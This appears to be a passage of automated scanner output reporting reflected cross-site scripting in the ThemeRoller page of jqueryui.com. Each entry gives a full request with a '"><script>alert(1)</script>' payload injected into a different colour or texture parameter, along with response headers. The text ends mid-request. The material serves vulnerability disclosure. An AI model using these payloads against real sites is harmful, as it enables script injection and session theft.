HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 07:58:06 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120190
The value of the bgTextureContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd035"><script>alert(1)</script>66642ae8c0e was submitted in the bgTextureContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.pngbd035"><script>alert(1)</script>66642ae8c0e&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 07:57:51 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120190
The value of the bgTextureDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9914"><script>alert(1)</script>6c32ca50cc1 was submitted in the bgTextureDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.pngd9914"><script>alert(1)</script>6c32ca50cc1&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 07:57:56 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120190
The value of the bgTextureError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58a46"><script>alert(1)</script>37189a3fb88 was submitted in the bgTextureError parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png58a46"><script>alert(1)</script>37189a3fb88&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 07:58:16 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120190
The value of the bgTextureHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a34e4"><script>alert(1)</script>6f6deb6985f was submitted in the bgTextureHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.pnga34e4"><script>alert(1)</script>6f6deb6985f&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 07:57:46 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120190
The value of the bgTextureHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b375"><script>alert(1)</script>7b1d7aa2412 was submitted in the bgTextureHighlight parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png8b375"><script>alert(1)</script>7b1d7aa2412&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 07:58:11 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120190
The value of the bgTextureHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fdc19"><script>alert(1)</script>ce6b6f37d34 was submitted in the bgTextureHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.pngfdc19"><script>alert(1)</script>ce6b6f37d34&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 07:58:01 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120190
The value of the bgTextureOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c7a73"><script>alert(1)</script>ecfc02072aa was submitted in the bgTextureOverlay parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.pngc7a73"><script>alert(1)</script>ecfc02072aa&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 07:58:20 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120190
The value of the bgTextureShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68388"><script>alert(1)</script>c2f5ccaa993 was submitted in the bgTextureShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png68388"><script>alert(1)</script>c2f5ccaa993&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 07:58:23 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120190
The value of the borderColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e580"><script>alert(1)</script>1fa0fca1bf5 was submitted in the borderColorActive parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd8508e580"><script>alert(1)</script>1fa0fca1bf5&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 07:58:07 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120256
The value of the borderColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95bac"><script>alert(1)</script>fd22abbdbef was submitted in the borderColorContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd95bac"><script>alert(1)</script>fd22abbdbef&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 07:57:53 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120256
The value of the borderColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a6a4"><script>alert(1)</script>35255517304 was submitted in the borderColorDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc2a6a4"><script>alert(1)</script>35255517304&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 07:57:58 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120256
The value of the borderColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 872b5"><script>alert(1)</script>9fff6b1c01 was submitted in the borderColorError parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a872b5"><script>alert(1)</script>9fff6b1c01&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 07:58:17 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120253
The value of the borderColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a120e"><script>alert(1)</script>942bd0c6a4c was submitted in the borderColorHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08a120e"><script>alert(1)</script>942bd0c6a4c&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&b